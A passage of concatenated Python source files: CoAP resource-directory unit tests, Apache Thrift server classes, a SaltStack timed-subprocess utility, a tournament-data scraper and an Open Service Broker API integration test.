self.server_thread.join(timeout=25)
self.server = None
@staticmethod
def delete_database():
database = defines.MONGO_DATABASE
connection = MongoClient(defines.MONGO_HOST, defines.MONGO_PORT, username=defines.MONGO_USER,
password=defines.MONGO_PWD, authSource=database, authMechanism='SCRAM-SHA-1')
collection = connection[database].resources
try:
collection.delete_many({})
except:
print("Error in delete_database")
@staticmethod
def parse_core_link_format(link_format):
data = []
while len(link_format) > 0:
pattern = "<([^>]*)>"
result = re.match(pattern, link_format)
path = result.group(1)
link_format = link_format[result.end(1) + 2:]
pattern = "([^<,])*"
result = re.match(pattern, link_format)
attributes = result.group(0)
dict_att = {}
if len(attributes) > 0:
attributes = attributes.split(";")
for att in attributes:
a = att.split("=")
if len(a) > 1:
if a[1].isdigit():
a[1] = int(a[1])
else:
a[1] = a[1].replace('"', '')
dict_att[a[0]] = a[1]
else:
dict_att[a[0]] = a[0]
link_format = link_format[result.end(0) + 1:]
tmp = {'path': path}
dict_att.update(tmp)
data.append(dict_att)
return data
def _test_check(self, message_list, timeout=0):
serializer = Serializer()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for message, expected in message_list:
if message is not None:
datagram = serializer.serialize(message)
sleep(timeout)
sock.sendto(datagram, message.destination)
if expected is not None:
datagram, source = sock.recvfrom(4096)
received_message = serializer.deserialize(datagram, source)
if expected.type is not None:
self.assertEqual(received_message.type, expected.type)
if expected.mid is not None:
self.assertEqual(received_message.mid, expected.mid)
self.assertEqual(received_message.code, expected.code)
if expected.source is not None:
self.assertEqual(received_message.source, source)
if expected.token is not None:
self.assertEqual(received_message.token, expected.token)
if expected.content_type is not None:
self.assertEqual(received_message.content_type, expected.content_type)
if expected.payload is not None:
expected_list = self.parse_core_link_format(expected.payload)
received_list = self.parse_core_link_format(received_message.payload)
self.assertEqual(len(expected_list), len(received_list))
all_list = []
for expected_elem in expected_list:
for received_elem in received_list:
if expected_elem['path'] == received_elem['path']:
all_list_elem = (expected_elem, received_elem)
all_list.append(all_list_elem)
self.assertEqual(len(expected_list), len(all_list))
for data in all_list:
for k in data[1]:
self.assertIn(k, data[0])
if (k != "lt") and (k in data[0]):
self.assertEqual(data[0][k], data[1][k])
else:
self.assertEqual(expected.payload, received_message.payload)
sock.close()
def test_uri_discovery(self):
print("Uri discovery")
path = ".well-known/core"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '</rd-lookup/res>;rt="core.rd-lookup-res";ct=40,</rd>;rt="core.rd";ct=40,' \
'</rd-lookup/ep>;rt="core.rd-lookup-ep";ct=40'
self.current_mid += 1
self._test_check([(req, expected)])
def test_registration(self):
print("Registration")
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = defines.Content_types["application/link-format"]
req.payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";' \
'anchor="coap://spurious.example.com:5683",</sensors/light>;ct=41;rt="light-lux";if="sensor"'
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CREATED.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_lookup_res(self):
print("Resource lookup")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
client.post(path, payload, None, None, **ct)
client.stop()
path = "rd-lookup/res?ep=node1&rt=temperature-c"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '<coap://local-proxy-old.example.com:5683/sensors/temp>;ct=41;rt="temperature-c";' \
'if="sensor";anchor="coap://spurious.example.com:5683"'
self.current_mid += 1
self._test_check([(req, expected)])
def test_lookup_ep(self):
print("Endpoint lookup")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683&et=oic.d.sensor"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
loc_path = response.location_path
client.stop()
path = "rd-lookup/ep?et=oic.d.sensor"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '</' + loc_path + '>;con="coap://local-proxy-old.example.com:5683";ep="node1";' \
'et="oic.d.sensor";lt=500'
self.current_mid += 1
self._test_check([(req, expected)])
def test_update(self):
print("Update")
client = HelperClient(self.server_address)
path = "rd?ep=endpoint1<=500&con=coap://local-proxy-old.example.com:5683&et=oic.d.sensor"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
loc_path = response.location_path
client.stop()
path = loc_path + "?con=coaps://new.example.com:5684"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CHANGED.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_read_endpoint_links(self):
print("Read endpoint links")
client = HelperClient(self.server_address)
path = "rd?ep=endpoint1<=500&con=coap://local-proxy-old.example.com:5683&et=oic.d.sensor"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
loc_path = response.location_path
client.stop()
path = loc_path
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '<coap://local-proxy-old.example.com:5683/sensors/temp>;ct=41;rt="temperature-c";' \
'if="sensor";anchor="coap://spurious.example.com:5683",' \
'<coap://local-proxy-old.example.com:5683/sensors/light>;ct=41;rt="light-lux";if="sensor"'
self.current_mid += 1
self._test_check([(req, expected)])
def test_delete(self):
print("Delete")
client = HelperClient(self.server_address)
path = "rd?ep=endpoint1<=500&con=coap://local-proxy-old.example.com:5683&et=oic.d.sensor"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
loc_path = response.location_path
client.stop()
path = loc_path
req = Request()
req.code = defines.Codes.DELETE.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.DELETED.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_lookup_expired_res(self):
print("Expired resource lookup")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683<=60"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
client.post(path, payload, None, None, **ct)
client.stop()
path = "rd-lookup/res?ep=node1&rt=temperature-c"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)], 61)
def test_lookup_expired_ep(self):
print("Expired endpoint lookup")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683<=60"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
client.post(path, payload, None, None, **ct)
client.stop()
path = "rd-lookup/ep?ep=node1&rt=temperature-c"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = None
self.current_mid += 1
# After 61 seconds the resource will be expired
self._test_check([(req, expected)], 61)
def test_update_expired(self):
print("Update expired registration resource")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683<=60"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
# After 61 seconds the resource will be expired
sleep(61)
loc_path = response.location_path
client.post(loc_path, None)
client.stop()
path = "rd-lookup/res?ep=node1&rt=temperature-c"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '<coap://local-proxy-old.example.com:5683/sensors/temp>;ct=41;rt="temperature-c";' \
'if="sensor";anchor="coap://spurious.example.com:5683"'
self.current_mid += 1
self._test_check([(req, expected)])
def test_wrong_ep(self):
print("Endpoint name already exists")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683<=60"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
client.post(path, payload, None, None, **ct)
client.stop()
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = defines.Content_types["application/link-format"]
req.payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";' \
'anchor="coap://spurious.example.com:5683",</sensors/light>;ct=41;rt="light-lux";if="sensor"'
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.SERVICE_UNAVAILABLE.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_no_ep(self):
print("Registration without endpoint name")
path = "rd?con=coap://local-proxy-old.example.com:5683"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = defines.Content_types["application/link-format"]
req.payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";' \
'anchor="coap://spurious.example.com:5683",</sensors/light>;ct=41;rt="light-lux";if="sensor"'
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.BAD_REQUEST.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_update_res_not_found(self):
print("Resource not found on update")
path = "rd/4521?con=coaps://new.example.com:5684"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.NOT_FOUND.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_delete_res_not_found(self):
print("Resource not found on delete")
path = "rd/4521"
req = Request()
req.code = defines.Codes.DELETE.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.NOT_FOUND.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_wildcard_res(self):
print("Use wildcard * to find resources")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
client.post(path, payload, None, None, **ct)
path = "rd?ep=node2&con=coap://[2001:db8:3::123]:61616"
payload = '</temp>;rt="temperature";anchor="coap://[2001:db8:3::123]:61616"'
client.post(path, payload, None, None, **ct)
client.stop()
path = "rd-lookup/res?rt=temp*"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '<coap://local-proxy-old.example.com:5683/sensors/temp>;ct=41;rt="temperature-c";' \
'if="sensor";anchor="coap://spurious.example.com:5683",' \
'<coap://[2001:db8:3::123]:61616/temp>;rt="temperature";' \
'anchor="coap://[2001:db8:3::123]:61616"'
self.current_mid += 1
self._test_check([(req, expected)])
def test_wildcard_ep(self):
print("Use wildcard * to find endpoints")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
loc_path1 = response.location_path
path = "rd?ep=node2&con=coap://[2001:db8:3::123]:61616"
payload = '</temp>;rt="temperature";anchor="coap://[2001:db8:3::123]:61616"'
response = client.post(path, payload, None, None, **ct)
loc_path2 = response.location_path
client.stop()
path = "rd-lookup/ep?rt=temp*"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '</' + loc_path1 + '>;con="coap://local-proxy-old.example.com:5683";ep="node1";lt=500,' \
'</' + loc_path2 + '>;con="coap://[2001:db8:3::123]:61616";' \
'ep="node2";lt=500'
self.current_mid += 1
self._test_check([(req, expected)])
if __name__ == '__main__':
unittest.main()
|
TServer.py
|
from six.moves import queue
import logging
import os
import threading
from thrift.protocol import TBinaryProtocol
from thrift.transport import TTransport
logger = logging.getLogger(__name__)
class TServer(object):
def __init__(self, *args):
if (len(args) == 2):
self.__initArgs__(args[0], args[1],
TTransport.TTransportFactoryBase(),
TTransport.TTransportFactoryBase(),
TBinaryProtocol.TBinaryProtocolFactory(),
TBinaryProtocol.TBinaryProtocolFactory())
elif (len(args) == 4):
self.__initArgs__(args[0], args[1], args[2], args[2], args[3], args[3])
elif (len(args) == 6):
self.__initArgs__(args[0], args[1], args[2], args[3], args[4], args[5])
def __initArgs__(self, processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory):
self.processor = processor
self.serverTransport = serverTransport
self.inputTransportFactory = inputTransportFactory
self.outputTransportFactory = outputTransportFactory
self.inputProtocolFactory = inputProtocolFactory
self.outputProtocolFactory = outputProtocolFactory
def serve(self):
pass
class TSimpleServer(TServer):
def __init__(self, *args):
TServer.__init__(self, *args)
def serve(self):
self.serverTransport.listen()
while True:
client = self.serverTransport.accept()
if not client:
continue
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException:
pass
except Exception as x:
logger.exception(x)
itrans.close()
otrans.close()
class TThreadedServer(TServer):
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.daemon = kwargs.get("daemon", False)
def serve(self):
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
if not client:
continue
t = threading.Thread(target=self.handle, args=(client,))
t.setDaemon(self.daemon)
t.start()
except KeyboardInterrupt:
raise
except Exception as x:
logger.exception(x)
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException:
pass
except Exception as x:
logger.exception(x)
itrans.close()
otrans.close()
class TThreadPoolServer(TServer):
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.clients = queue.Queue()
self.threads = 10
self.daemon = kwargs.get("daemon", False)
def setNumThreads(self, num):
self.threads = num
def serveThread(self):
while True:
try:
client = self.clients.get()
self.serveClient(client)
except Exception as x:
logger.exception(x)
def serveClient(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException:
pass
except Exception as x:
logger.exception(x)
itrans.close()
otrans.close()
def serve(self):
for i in range(self.threads):
try:
t = threading.Thread(target=self.serveThread)
t.setDaemon(self.daemon)
t.start()
except Exception as x:
logger.exception(x)
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
if not client:
continue
self.clients.put(client)
except Exception as x:
logger.exception(x)
class TForkingServer(TServer):
def __init__(self, *args):
TServer.__init__(self, *args)
self.children = []
def serve(self):
def try_close(file):
try:
file.close()
except IOError as e:
logger.warning(e, exc_info=True)
self.serverTransport.listen()
while True:
client = self.serverTransport.accept()
if not client:
continue
try:
pid = os.fork()
if pid:
self.children.append(pid)
self.collect_children()
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
try_close(itrans)
try_close(otrans)
else:
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
ecode = 0
try:
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException:
pass
except Exception as e:
logger.exception(e)
ecode = 1
finally:
try_close(itrans)
try_close(otrans)
os._exit(ecode)
except TTransport.TTransportException:
pass
except Exception as x:
logger.exception(x)
def collect_children(self):
while self.children:
try:
pid, status = os.waitpid(0, os.WNOHANG)
except os.error:
pid = None
if pid:
self.children.remove(pid)
else:
break
|
timed_subprocess.py
|
"""
For running command line executables with a timeout
"""
import shlex
import subprocess
import threading
import salt.exceptions
import salt.utils.data
import salt.utils.stringutils
class TimedProc:
"""
Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs
"""
def __init__(self, args, **kwargs):
self.wait = not kwargs.pop("bg", False)
self.stdin = kwargs.pop("stdin", None)
self.with_communicate = kwargs.pop("with_communicate", self.wait)
self.timeout = kwargs.pop("timeout", None)
self.stdin_raw_newlines = kwargs.pop("stdin_raw_newlines", False)
# If you're not willing to wait for the process
# you can't define any stdin, stdout or stderr
if not self.wait:
self.stdin = kwargs["stdin"] = None
self.with_communicate = False
elif self.stdin is not None:
if not self.stdin_raw_newlines:
# Translate a newline submitted as '\n' on the CLI to an actual
# newline character.
self.stdin = salt.utils.stringutils.to_bytes(
self.stdin.replace("\\n", "\n")
)
kwargs["stdin"] = subprocess.PIPE
if not self.with_communicate:
self.stdout = kwargs["stdout"] = None
self.stderr = kwargs["stderr"] = None
if self.timeout and not isinstance(self.timeout, (int, float)):
raise salt.exceptions.TimedProcTimeoutError(
"Error: timeout {} must be a number".format(self.timeout)
)
if kwargs.get("shell", False):
args = salt.utils.data.decode(args, to_str=True)
try:
self.process = subprocess.Popen(args, **kwargs)
except (AttributeError, TypeError):
if not kwargs.get("shell", False):
if not isinstance(args, (list, tuple)):
try:
args = shlex.split(args)
except AttributeError:
args = shlex.split(str(args))
str_args = []
for arg in args:
if not isinstance(arg, str):
str_args.append(str(arg))
else:
str_args.append(arg)
args = str_args
else:
if not isinstance(args, (list, tuple, str)):
# Handle corner case where someone does a 'cmd.run 3'
args = str(args)
# Ensure that environment variables are strings
for key, val in kwargs.get("env", {}).items():
if not isinstance(val, str):
kwargs["env"][key] = str(val)
if not isinstance(key, str):
kwargs["env"][str(key)] = kwargs["env"].pop(key)
args = salt.utils.data.decode(args)
self.process = subprocess.Popen(args, **kwargs)
self.command = args
def run(self):
"""
wait for subprocess to terminate and return subprocess' return code.
If timeout is reached, throw TimedProcTimeoutError
"""
def receive():
if self.with_communicate:
self.stdout, self.stderr = self.process.communicate(input=self.stdin)
elif self.wait:
self.process.wait()
if not self.timeout:
receive()
else:
rt = threading.Thread(target=receive)
rt.start()
rt.join(self.timeout)
if rt.is_alive():
# Subprocess cleanup (best effort)
self.process.kill()
def terminate():
if rt.is_alive():
self.process.terminate()
threading.Timer(10, terminate).start()
raise salt.exceptions.TimedProcTimeoutError(
"{} : Timed out after {} seconds".format(
self.command, str(self.timeout),
)
)
return self.process.returncode
|
get_data.py
|
import requests
import csv
import time
import json
from collections import *
from api_scrape_util import *
import threading
import sys
def get_data(slug, supress_output):
tourn_info = get_tournament_info(slug)
event_phases = tourn_info['phases_per_event']
phase_groups = tourn_info['groups_per_phase']
#Separate each phase by game
events = {}
for event_id in event_phases:
r = requests.get(format_url(api_prefix, 'event/', str(event_id), api_entrant_postfix))
evnt_data = json.loads(r.text)
events[evnt_data["entities"]["event"]["id"]] = Event(event_id, evnt_data["entities"]["event"]["name"], evnt_data["entities"]["event"]["videogameId"], evnt_data["entities"]["event"]["type"])
tmp = evnt_data["entities"]["entrants"]
events[evnt_data["entities"]["event"]["id"]].add_entrants(tmp)
#At this point, we've scrapped all events, phases, and entrants
#print("Retrieved events")
for event in events:
events[event].add_phases(event_phases[event])
for phase in events[event].phases:
events[event].add_groups(phase_groups[phase])
for event in events:
#Uses the skip criteria defined in skip_event to check if we care about this event.
if(skip_event(events, event)):
continue
#Update the master tournament file
master_file = "../data/" + events[event].game + "/" + events[event].format + "/tournaments.csv"
master_lock.acquire()
update_master_file(master_file,slug, tourn_info['name'], tourn_info['dates'], events[event])
master_lock.release()
#Update the sets file
filename = get_filename(events[event].game, events[event].format,slug,'-sets.csv')
if(not supress_output):
print("Working on " + filename + "...")
doubles = write_set_data(filename, events[event], supress_output)
#Update the standings file
filename = get_filename(events[event].game, events[event].format,slug,'-standings.csv')
write_placements(filename, events[event], doubles)
if(supress_output):
slug_lock.acquire()
all_slugs.pop(slug, None)
slug_lock.release()
#Declare all needed threads and locks
threads = []
all_slugs = {}
master_lock = threading.RLock()
slug_lock = threading.RLock()
def Single():
slug = input("What is the tournament slug?\n")
get_data(slug, False)
def Multi():
#Open the slugs file to read all tournaments to scrape
slug_file = "../data/slugs.csv"
f = open(slug_file,"r")
reader = csv.reader(f)
slug_list = list(reader)
iterations = len(slug_list[1::])
for i in range(1,iterations + 1):
slug = slug_list[i][1]
slug_lock.acquire()
all_slugs[slug] = slug
#print("Starting Tournament: ", slug)
slug_lock.release()
#Create a thread to grab data, surpress output
t = threading.Thread(target=get_data, args=(slug,True))
threads.append(t)
t.start()
#Print the remaining threads, and check every half second.
while(threading.activeCount() != 1):
sys.stdout.write("Threads Remaining: {0}\r".format(threading.activeCount()))
sys.stdout.flush()
time.sleep(0.5)
for thread in threads:
thread.join()
print("Error'd files: ", all_slugs)
mode = input("Single Mode (s)? Or File Mode (f)?\n")
valid = False
if(mode == "s"):
Single()
valid = True
if(mode == "f"):
Multi()
valid = True
if(not valid):
print("Please select a valid mode and rerun.")
|
test_integration_using_async_flow.py
|
import json
import time
from http import HTTPStatus
from threading import Thread
from typing import Union, List, Optional
from unittest import TestCase
from uuid import uuid4
import requests
from requests.auth import HTTPBasicAuth
from openbrokerapi import api, errors
from openbrokerapi.catalog import ServicePlan
from openbrokerapi.service_broker import (
ServiceBroker,
Service,
ProvisionDetails,
ProvisionedServiceSpec,
ProvisionState,
LastOperation,
OperationState,
DeprovisionDetails,
DeprovisionServiceSpec,
BindDetails,
Binding,
BindState,
UnbindDetails,
UnbindSpec,
GetInstanceDetailsSpec,
GetBindingSpec)
class FullBrokerTestCase(TestCase):
def setUp(self) -> None:
broker_username = str(uuid4())
broker_passsword = str(uuid4())
self.request_ads = {
'auth': HTTPBasicAuth(broker_username, broker_passsword),
'headers': {'X-Broker-Api-Version': '2.15', 'Content-Type': 'application/json'}
}
self.service_guid = str(uuid4())
self.plan_guid = str(uuid4())
self.broker = InMemoryBroker(self.service_guid, self.plan_guid)
def run_server():
api.serve(self.broker, api.BrokerCredentials(broker_username, broker_passsword), port=5001)
# self.server = Process(target=run_server)
self.server = Thread(target=run_server)
self.server.setDaemon(True)
self.server.start()
time.sleep(2)
def test_lifecycle(self):
# GIVEN
org_guid = str(uuid4())
space_guid = str(uuid4())
instance_guid = str(uuid4())
binding_guid = str(uuid4())
# CATALOG
self.check_catalog(self.service_guid, self.plan_guid)
# ASYNC PROVISION
operation = self.check_provision(instance_guid, org_guid, space_guid, self.service_guid, self.plan_guid)
self.check_last_operation_after_provision(instance_guid, operation)
# GET INSTANCE
self.check_instance_retrievable(instance_guid)
# ASYNC BIND
operation = self.check_bind(binding_guid, instance_guid)
self.check_last_operation_after_bind(binding_guid, instance_guid, operation)
# GET BINDING
response = requests.get(
"http://localhost:5001/v2/service_instances/{}/service_bindings/{}".format(instance_guid, binding_guid),
**self.request_ads)
self.assertEqual(HTTPStatus.OK, response.status_code)
self.assertDictEqual({}, response.json())
# ASYNC UNBIND
operation = self.check_unbind(binding_guid, instance_guid)
self.check_last_operation_after_unbind(binding_guid, instance_guid, operation)
# ASYNC DEPROVISION
operation = self.check_deprovision(instance_guid, operation)
self.check_last_operation_after_deprovision(instance_guid, operation)
# DEPROVISION TWICE
self.check_deprovision_after_deprovision_done(instance_guid)
def check_instance_retrievable(self, instance_guid):
response = requests.get(
"http://localhost:5001/v2/service_instances/{}".format(instance_guid), **self.request_ads)
self.assertEqual(HTTPStatus.OK, response.status_code)
self.assertEqual(self.service_guid, response.json()['service_id'])
self.assertEqual(self.plan_guid, response.json()['plan_id'])
def check_unbind(self, binding_guid, instance_guid):
response = requests.delete(
"http://localhost:5001/v2/service_instances/{}/service_bindings/{}".format(instance_guid, binding_guid),
params={
"service_id": self.service_guid,
"plan_id": self.plan_guid,
'accepts_incomplete': 'true'
},
**self.request_ads
)
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
operation = response.json().get('operation')
self.assertEqual('unbind', operation)
return operation
def check_last_operation_after_bind(self, binding_guid, instance_guid, operation):
response = requests.get(
'http://localhost:5001/v2/service_instances/{}/service_bindings/{}/last_operation'.format(instance_guid,
binding_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'operation': operation,
},
**self.request_ads)
self.assertEqual(HTTPStatus.OK, response.status_code)
self.assertEqual('succeeded', response.json()['state'])
def check_last_operation_after_unbind(self, binding_guid, instance_guid, operation):
response = requests.get(
'http://localhost:5001/v2/service_instances/{}/service_bindings/{}/last_operation'.format(instance_guid,
binding_guid),
params={
'service_id': self.service_guid,
'plan_id': self.plan_guid,
'operation': operation,
},
**self.request_ads)
self.assertEqual(HTTPStatus.OK, response.status_code)
self.assertEqual('succeeded', response.json()['state'])
